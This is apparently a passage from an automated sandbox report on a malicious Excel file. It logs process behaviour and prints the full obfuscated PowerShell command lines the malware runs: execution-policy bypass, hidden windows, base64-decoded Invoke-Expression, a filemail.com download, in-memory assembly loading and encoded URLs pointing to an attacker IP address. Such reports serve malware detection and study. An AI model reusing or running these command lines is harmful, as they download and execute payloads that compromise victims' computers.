      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: Swiftcopy.xla.xlsx Stream path 'Workbook' entropy: 7.99900412476 (max. 8.0)
      Source: 73B30000.0.dr Stream path 'Workbook' entropy: 7.99898529658 (max. 8.0)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6418
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3537
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 993
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1769
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2412
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3102
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll
      Source: C:\Windows\System32\mshta.exe TID: 3968 Thread sleep time: -420000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep count: 6418 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep count: 3537 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3336 Thread sleep time: -120000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3068 Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404 Thread sleep count: 2412 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404 Thread sleep count: 3102 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2252 Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match File source: Process Memory Space: powershell.exe PID: 2036, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('4amochavilha = siwhttps://310'+'5.filemail.com/api/file/get?filekey=shtph'+'bcpx8o'+'-lotcqhlg6_0x'+'cy-xl4tnxlavbq95-dv'+'itk5car'+'andqjbb3mexfwqzkmtxg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c siw;4amtrichismo = new-object system.net.webclient;4amlinfotomia = '+'4amtrichismo.downloaddata(4amo'+'chavilha);4ampresum'+'ptu'+'oso = [system.text.encoding]::utf8.getstring(4'+'amlinfotom'+'ia);4amnitidular = siw<<ba'+'se64_start>>siw;4amobvolvido = siw'+'<<base6'+'4_end>>siw;4amlogogrifo = 4ampr'+'esumptuoso.indexof(4amniti'+'dular'+');4amtolhido = 4ampresumptuoso.indexof(4amo'+'bvolvido);4amlogogrifo -ge 0 -and 4amtolhido -gt 4amlogogrifo;4amlogogrifo += 4amnitidular.leng'+'th;4amvindita = 4amtolhido - 4amlogogrifo;4am'+'figa = 4ampresumptuoso.substring(4amlogogrifo, 4amvindita);4amantigamente = -join (4amfiga.to'+'chararra'+'y() s'+'e2 foreach-obje'+'ct { 4am_ })[-1..-(4amfiga.length)];4amma'+'rmor'+'izar'+' = ['+'system.convert]::frombase64string(4amantigamente);4amdesemmadeirar = [system.reflection.assemb'+'ly]::load(4ammarmorizar);4ampoe'+'tificar = [dnlib.io.home].getmethod(s'+'iwvais'+'iw);4am'+'poetificar.invoke(4amnull, @(siwtxt.vgfre/3431/92.321.542.271//:ptthsiw, siw4amde'+'sunificarsiw, siw4amdesunificarsiw, siw4amdesunificarsiw, siwaspnet_compilersiw, siw4'+'amdesunificarsiw, siw4amdesunificarsiw,siw4amdesunifica'+'rsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw1siw,si'+'w4amdesunificarsiw));') -creplace ([char]52+[char]65+[char]109),[char]36 -creplace 'siw',[char]39 -creplace([char]83+[char]69+[char]50),[char]124) | &( $env:comspec[4,24,25]-join'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
